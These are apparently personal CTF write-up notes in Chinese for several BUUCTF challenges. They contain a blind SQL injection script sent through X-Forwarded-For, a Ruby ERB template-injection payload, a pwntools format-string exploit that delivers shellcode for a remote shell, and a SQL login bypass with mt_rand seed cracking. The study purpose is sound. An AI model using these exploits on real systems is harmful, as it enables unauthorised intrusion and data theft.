BUU WEB PWN

[RoarCTF 2019]Online Proxy

知识点：xff 二次注入

poc

0' or 1 or '0
111
111 
是1
0' or 0 or '0
111
111
是0

https://www.jianshu.com/p/08aabdbc8a7b

# coding:utf-8
import requests
import time
url = 'http://node4.buuoj.cn:25902/'

res = ''
for i in range(1,200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:
        #payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i,mid)
        burp0_cookies = {"OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924",
                         "UM_distinctid": "17b0b3c6b83d44-005a7fe99cb475-d7e163f-144000-17b0b3c6b84c1f",
                         "track_uuid": "bad65c37-76b0-4e9f-9145-7e33ee6a045e",
                         'X-Forwarded-For': payload
                         }

        r = requests.post(url = url, headers = burp0_cookies)
        print(r.text)

        payload = '111'
        burp0_cookies = {"OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924",
                         "UM_distinctid": "17b0b3c6b83d44-005a7fe99cb475-d7e163f-144000-17b0b3c6b84c1f",
                         "track_uuid": "bad65c37-76b0-4e9f-9145-7e33ee6a045e",
                         'X-Forwarded-For': payload
                         }

        r = requests.post(url = url, headers = burp0_cookies)
        print(r.text)

        payload = '111'
        burp0_cookies = {"OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924",
                         "UM_distinctid": "17b0b3c6b83d44-005a7fe99cb475-d7e163f-144000-17b0b3c6b84c1f",
                         "track_uuid": "bad65c37-76b0-4e9f-9145-7e33ee6a045e",
                         'X-Forwarded-For': payload
                         }
        r = requests.post(url = url, headers = burp0_cookies)
        print(r.text)

        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
        if 'Last Ip: 1'  in r.text:
            left = mid + 1
        elif 'Last Ip: 1' not in r.text:
            right = mid
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break
    res += chr(mid)
    print(str(mid),res)
    time.sleep(1)
# information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
#F4l9_t4b1e
#F4l9_C01uMn

[SCTF2019]Flag Shop

知识点：ruby ssti

后端ruby写的

如何运行ruby代码

1 -e

2 在命令行输入irb

3 文件

代码看的还可以！发现可以直接传参控制输出！ssti！

这里需要用到Ruby语言的一个特性。我们可以利用$'来返回正则匹配结果的右边。举个例子：

>> "There were once ten tin robots standing in a row." =~ /robot/
#意思就是正则匹配 robot
=> 24
>> $'
=> "s standing in a row."
#返回了右半部分。
=> "ro"
=> nil

题目里当参数SECRET值不存在时！ENV["SECRET"]就正则匹配！相当于它自己了！

payload:

/work?SECRET=&name=<%=$'%>&do=<%=$'%> is working
/work?SECRET=&name=%3c%25%3d%24%27%25%3e&do=%3c%25%3d%24%27%25%3e%20%69%73%20%77%6f%72%6b%69%6e%67

{
  "uid": "c645dd09-6653-4e11-9066-e6b970a35866",
  "jkl": 1e+77
}

PWN

string

知识点 ：格式化字符串

其实不太懂为什么掉到这里就可以直接有shell了！

((void (__fastcall *)(_QWORD, void *))v1)(0LL, v1);

先去理解过程！

首先v4就是V3 V3的地址一开始也给了！

secret[0] is 19da260
secret[1] is 19da264

发现有这3个函数！

sub_400BB9里有格式化字符串漏洞！

就就通过漏洞重写V3[0]！

让V3[0] = V3[1]

输入 AAAA,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x

或者 AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p

poc

upload
east
1
AAAA,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
AAAA,e92e47e3,e92e58c0,e9008264,c,0,e92e02a0,0,41414141,252c7825,2c78252c,78252c78,252c7825,78252cI

发现偏移量是8！

其实这个题我想的是 偏移8位！直接给format 付上v3地址 然后偏移8个覆盖自己！但是最后不行！

只能给format 前一个v2地址赋值！然后偏移7个！我人有点晕 不知道为什么自己的思路不行！

它的思路也很明确！ 就是覆盖V2！ v2就在format 前面！所以偏移7位就行了！🙄🙄🙄

完了！不知道自己思路那错了！太菜了！哭哭哭！

exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2021/8/4 17:19
# @Author  : upload
# @File    : string.py
# @Software: PyCharm

from pwn import *

context(os="linux", arch="amd64", log_level="debug")
content = 2


def main():
    try:
        if content == 1:
            upload = process("string")
        else:
            upload = remote("111.200.241.244", 52607)
    except:
        print("[!] Content error~")

    upload.recvuntil("secret[0] is ")
    addr = int(upload.recvuntil("\n"), 16)
    print("addr",addr)

    payload = str(addr) + b'a' * 77 + b'%8$n'  # 8+77   85个字节  偏移8位后 覆盖V3 发现思路有问题!
    payload = "%85c%7$n"
    print(payload)
    upload.sendlineafter("What should your character's name be:\n", "upload")
    upload.sendlineafter("So, where you will go?east or up?:\n", "east")
    upload.sendlineafter("go into there(1), or leave(0)?:\n", "1")
    upload.sendlineafter("'Give me an address'\n", str(addr))
    upload.sendlineafter("And, you wish is:\n", payload)
    payload1 = asm(shellcraft.sh())
    upload.sendlineafter("Wizard: I will help you! USE YOU SPELL\n", payload1)

    upload.interactive()


main()

[MRCTF2020]Ezaudit

知识点：mt_rand伪随机数！

username=crispr&password=1'/**/||/**/1/**/||/**/'&Private_key=XuNhoueCDCGc&login=%E7%99%BB%E5%BD%95

爆破seed

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2021/8/4 23:37
# @Author  : upload
# @File    : [MRCTF2020]Ezaudit.py
# @Software: PyCharm

str1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2='KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
            break
print(res)

a = [36,36,0,61,47,47,0,61,42,42,0,61,41,41,0,61,52,52,0,61,37,37,0,61,3,3,0,61,35,35,0,61,36,36,0,61,43,43,0,61,0,0,0,61,47,47,0,61,55,55,0,61,13,13,0,61,61,61,0,61,29,29,0,61]
key = ''
for i in a:
    key += chr(i)
print(key)

然后用工具跑出种子！

poc

php 5 的环境
<?php
mt_srand(1775196155);
//公钥
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}

//genarate private_key
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
echo public_key();
echo ' ';
echo private_key();
?>